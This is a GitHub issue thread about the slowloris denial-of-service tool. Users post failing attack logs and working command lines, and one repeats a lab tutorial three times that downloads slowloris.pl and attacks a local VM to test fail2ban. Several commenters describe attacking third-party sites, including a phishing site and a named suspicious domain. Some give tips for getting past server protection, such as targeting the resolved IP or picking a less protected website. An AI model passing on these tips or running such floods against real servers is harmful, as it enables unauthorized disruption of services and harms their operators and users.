### ISSUE TITLE
Socket count: 0

### ISSUE THREAD

**Issue by elisaado** [gkbrk/slowloris#12]
Heyyy, um, not sure if it's an error or if it's normal but when I attack a website (I got permission ;), it's my own) I get: ```Sending keep-alive headers... Socket count: 0```, the website is running on apache, it seems like it disconnects all the sockets :/

Is this normal?
,
Eli

EDIT:

tried too with `-ua` (random user agent)

**Comment by gkbrk** [comment]
The server might have security extensions installed. I am not entirely sure but it might be disconnecting if an IP address makes too many connections. Or it might be some sort of firewall.

Can you try running the code with verbose output and see how many sockets it can create?

**Comment by elisaado** [comment]
(sorry for the late reply)
Hmm, maybe it's default.

Okay, I'll post the output soon.

**Comment by elisaado** [comment]
```[09-06-2017 13:15:44] Attacking http://www.xxxxxxx.nl with 200 sockets.
[09-06-2017 13:15:44] Creating sockets...
[09-06-2017 13:15:44] Creating socket nr 0
[09-06-2017 13:15:44] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:15:44] Recreating socket...
[09-06-2017 13:15:59] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:15:59] Recreating socket...
[09-06-2017 13:16:14] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:16:14] Recreating socket...
[09-06-2017 13:16:29] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:16:29] Recreating socket...
[09-06-2017 13:16:44] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:16:44] Recreating socket...
[09-06-2017 13:16:59] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:16:59] Recreating socket...
[09-06-2017 13:17:14] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:17:14] Recreating socket...
[09-06-2017 13:17:29] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:17:29] Recreating socket...
[09-06-2017 13:17:44] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:17:44] Recreating socket...
[09-06-2017 13:18:00] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:18:00] Recreating socket...
[09-06-2017 13:18:15] Sending keep-alive headers... Socket count: 0
[09-06-2017 13:18:15] Recreating socket...
```

**Comment by gkbrk** [comment]
Ah, the script fails the create even the first socket. I suspect the reason for this is the `http://www.` part. It needs a domain name instead of a URL, so trying it like `example.com` or `www.example.com` might solve your issue.

Let me know if the problem still persists.

**Comment by elisaado** [comment]
Tried that :/

And it's still not working lol

Thanks again for trying to help me :D

**Comment by hotcops** [comment]
I am having this same issue, same output. Has there been any updates?

**Comment by gkbrk** [comment]
@hotcops What is the command you're using to run slowloris?

**Comment by Wolf0fmusic** [comment]
Same error...
slowloris.py <IP> -p 80 -s 150

**Comment by krastykovyaz** [comment]
Try this tutorial:
# The first way to implement a DOS attack is to run ‘ Slowloris ’ (DOS attack tool) on your mac (not to the VM) so as to use it against the VM. Download it:
wget https://web.archive.org/web/20090620230243/http://ha.ckers.org/slowloris/slowloris.pl
# Open its source code and comment the line 4 if necessary (it is needed if you have not setup SSL for your VM's web server yet).
# Check the status of the  fail2ban  profile ‘ nginx-dos ’: sudo fail2ban-client status nginx-dos
# Send a request to the VM's web server – open a browser on your mac and enter your VM's IP address. Make sure that the VM's web server is accessible on your mac and you can access its default web page through the mac's browser. Then run ‘ slowloris.pl ’ from your mac in the following way:
chmod +x slowloris.pl
perl slowloris.pl -dns  <host computer IP>: <mac port
that forwards to the VM's HTTP port>
# Or:
perl slowloris.pl -dns  <host computer IP>: <mac port that forwards to the VM's HTTPS port>
# After that VM's web server would be attacked.  fail2ban  should read nginx 's logs, find there a lot of sudden requests and ban the IP address of the client which sends so many requests to the web server therefore you won't be able to see the VM web server's web page from the computer you have run  Slowloris  but the web page should be accessible when requesting it from other computers. See the list of the IP addresses that are banned:
sudo fail2ban-client status nginx-dos
# You can then unban some IP addresses so as to repeat the attack:
sudo fail2ban-client set nginx-dos unbanip < banned IP address>
# The second way to implement a DOS attack is to use Apache HTTP server benchmarking tool that is already installed on your mac. For the first make sure that  fail2ban  list of the banned IP address is empty: sudo fail2ban-client status nginx-dos
# Run Apache HTTP server benchmarking tool in the following way:
ab -n 10000 -c 50 http:// <mac's IP address> : <mac port that forwards to the VM's HTTP port>
# After that VM's web server would be attacked.  fail2ban  should read nginx 's logs, find there a lot of sudden requests and ban the IP address of the client which sends so many requests to the web server therefore you won't be able to see the VM web server's web page from the computer you have run  Slowloris  but the web page should be accessible when requesting it from other computers. See the list of the IP addresses that are banned:
sudo fail2ban-client status nginx-dos
# You can then unban some IP addresses so as to repeat the attack:
sudo fail2ban-client set nginx-dos unbanip < banned IP address>
# Now let's make sure  fail2ban  can stop SSH login brute-forcing. Note that  fail2ban  by default won't work when:
1) an attacker have a correct RSA private key but enters a wrong passphrase.
2) an attacker does not have a correct RSA private key but tries to log in as an existing user (a user that exists on the VM).
By default  fail2ban  should ban when an attacker tries to log in as a user that does not exist on the VM 5 times in a row. You can try such kind of attacks and then check  fail2ban  status:
sudo fail2ban-client status ssh
# The output of that command should consist of a list of IP addresses that have been banned. You can then unban some IP addresses so as to repeat the attack:
sudo fail2ban-client set sshd unbanip < banned IP address>

**Comment by krastykovyaz** [comment]
I received the result with that tutorial. Try it:
# The first way to implement a DOS attack is to run ‘ Slowloris ’ (DOS attack tool) on your mac (not to the VM) so as to use it against the VM. Download it:
```wget https://web.archive.org/web/20090620230243/http://ha.ckers.org/slowloris/slowloris.pl```
# Open its source code and comment the line 4 if necessary (it is needed if you have not setup SSL for your VM's web server yet).
# Check the status of the  fail2ban  profile ‘ nginx-dos ’:
```sudo fail2ban-client status nginx-dos```
# Send a request to the VM's web server – open a browser on your mac and enter your VM's IP address. Make sure that the VM's web server is accessible on your mac and you can access its default web page through the mac's browser. Then run ‘ slowloris.pl ’ from your mac in the following way:
```
chmod +x slowloris.pl
perl slowloris.pl -dns  <host computer IP>: <mac port
that forwards to the VM's HTTP port>```
Or
```perl slowloris.pl -dns  <host computer IP>: <mac port that forwards to the VM's HTTPS port>```
# After that VM's web server would be attacked.  fail2ban  should read nginx 's logs, find there a lot of sudden requests and ban the IP address of the client which sends so many requests to the web server therefore you won't be able to see the VM web server's web page from the computer you have run  Slowloris  but the web page should be accessible when requesting it from other computers. See the list of the IP addresses that are banned:
```sudo fail2ban-client status nginx-dos```
# You can then unban some IP addresses so as to repeat the attack:
```sudo fail2ban-client set nginx-dos unbanip < banned IP address>```

**Comment by krastykovyaz** [comment]
I received the result with that tutorial. Try it:

The first way to implement a DOS attack is to run ‘ Slowloris ’ (DOS attack tool) on your mac (not to the VM) so as to use it against the VM. Download it:

wget https://web.archive.org/web/20090620230243/http://ha.ckers.org/slowloris/slowloris.pl

Open its source code and comment the line 4 if necessary (it is needed if you have not setup SSL for your VM's web server yet).

Check the status of the fail2ban profile ‘ nginx-dos ’:

sudo fail2ban-client status nginx-dos

Send a request to the VM's web server – open a browser on your mac and enter your VM's IP address. Make sure that the VM's web server is accessible on your mac and you can access its default web page through the mac's browser. Then run ‘ slowloris.pl ’ from your mac in the following way:

chmod +x slowloris.pl
perl slowloris.pl -dns  <host computer IP>: <mac port
that forwards to the VM's HTTP port>```
Or
```perl slowloris.pl -dns  <host computer IP>: <mac port that forwards to the VM's HTTPS port>```
 After that VM's web server would be attacked.  fail2ban  should read nginx 's logs, find there a lot of sudden requests and ban the IP address of the client which sends so many requests to the web server therefore you won't be able to see the VM web server's web page from the computer you have run  Slowloris  but the web page should be accessible when requesting it from other computers. See the list of the IP addresses that are banned:
```sudo fail2ban-client status nginx-dos```
 You can then unban some IP addresses so as to repeat the attack:
```sudo fail2ban-client set nginx-dos unbanip < banned IP address>```

**Comment by FosterG4** [comment]
Sending keep-alive headers... Socket count: 300 
work this command 
slowloris -u domain.com -s 300

**Comment by manzoo16** [comment]
> ```
> [09-06-2017 13:15:44] Attacking http://www.xxxxxxx.nl with 200 sockets.
> [09-06-2017 13:15:44] Creating sockets...
> [09-06-2017 13:15:44] Creating socket nr 0
> [09-06-2017 13:15:44] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:15:44] Recreating socket...
> [09-06-2017 13:15:59] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:15:59] Recreating socket...
> [09-06-2017 13:16:14] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:16:14] Recreating socket...
> [09-06-2017 13:16:29] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:16:29] Recreating socket...
> [09-06-2017 13:16:44] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:16:44] Recreating socket...
> [09-06-2017 13:16:59] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:16:59] Recreating socket...
> [09-06-2017 13:17:14] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:17:14] Recreating socket...
> [09-06-2017 13:17:29] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:17:29] Recreating socket...
> [09-06-2017 13:17:44] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:17:44] Recreating socket...
> [09-06-2017 13:18:00] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:18:00] Recreating socket...
> [09-06-2017 13:18:15] Sending keep-alive headers... Socket count: 0
> [09-06-2017 13:18:15] Recreating socket...
> ```

Try on a different website. Some websites have got stronger protection against the attack

**Comment by manzoo16** [comment]
> > ```
> > [09-06-2017 13:15:44] Attacking http://www.xxxxxxx.nl with 200 sockets.
> > [09-06-2017 13:15:44] Creating sockets...
> > [09-06-2017 13:15:44] Creating socket nr 0
> > [09-06-2017 13:15:44] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:15:44] Recreating socket...
> > [09-06-2017 13:15:59] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:15:59] Recreating socket...
> > [09-06-2017 13:16:14] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:16:14] Recreating socket...
> > [09-06-2017 13:16:29] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:16:29] Recreating socket...
> > [09-06-2017 13:16:44] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:16:44] Recreating socket...
> > [09-06-2017 13:16:59] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:16:59] Recreating socket...
> > [09-06-2017 13:17:14] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:17:14] Recreating socket...
> > [09-06-2017 13:17:29] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:17:29] Recreating socket...
> > [09-06-2017 13:17:44] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:17:44] Recreating socket...
> > [09-06-2017 13:18:00] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:18:00] Recreating socket...
> > [09-06-2017 13:18:15] Sending keep-alive headers... Socket count: 0
> > [09-06-2017 13:18:15] Recreating socket...
> > ```
> 
> Try on a different website. Some websites have got stronger protection against the attack

root@kali:~/Desktop/slowloris# python3 slowloris.py -u domain.com -s 150
[18-12-2019 09:28:22] Attacking domain.com with 150 sockets.
[18-12-2019 09:28:22] Creating sockets...
[18-12-2019 09:28:33] Sending keep-alive headers... Socket count: 128
[18-12-2019 09:28:50] Sending keep-alive headers... Socket count: 150

**Comment by indradanielb** [comment]
i have another output, but still socket count : 0

is this normal or there is a problem?
thanks

**Comment by elisaado** [comment]
I eventually (long time ago) got it working by leaving out the `http://` @indradanielb

**Comment by yurividal** [comment]
So, i was trying to take down a EE Phishing site. At first, using the http:// with the domain, worked. After 1 hour, it stoped working and i was getting Socket count: 0, even when removing the http.
I was able to get it to work by using the "IP -p 80" instead.
a quick nslookup gave me the ip

**Comment by JNBarr** [comment]
> So, i was trying to take down a EE Phishing site. At first, using the http:// with the domain, worked. After 1 hour, it stoped working and i was getting Socket count: 0, even when removing the http.
> I was able to get it to work by using the "IP -p 80" instead.
> a quick nslookup gave me the ip

- Useful tip
- Bro why you discussing unethical use?

**Comment by yurividal** [comment]
> > So, i was trying to take down a EE Phishing site. At first, using the http:// with the domain, worked. After 1 hour, it stoped working and i was getting Socket count: 0, even when removing the http.
> > I was able to get it to work by using the "IP -p 80" instead.
> > a quick nslookup gave me the ip
> 
> * Useful tip
> * Bro why you discussing unethical use?

Sorry, but I dont think taking down a criminal site is unethical. I actually think it's pretty ethical.

**Comment by Trikw** [comment]
It works fine with websites but when i try an IP i get this Sending keep-alive headers... Socket count: 0

**Comment by lthon09** [comment]
im trying to ddos something looks like a scam website or something that can inject a virus, and it aims for mobile users. ive tried this command:
```
python3.8 slowloris.py dadyapp.com -s 500 -ua
```

well dadyapp.com looks suspicious, ive also tried some stuff on the website and yes, it just redirects me to some websites that requires verification to proceed (which is kinda popular). it outputs:
```
Sending keep-alive headers... Socket count: 500
```
the exact amount of sockets ive wanted it to send. but it does literally nothing

any idea? theyre appreciated

**Comment by 3415479562** [comment]
ssl连接是正常的吗？我之前也是遇到这个问题，好像是ssl连接的问题哦
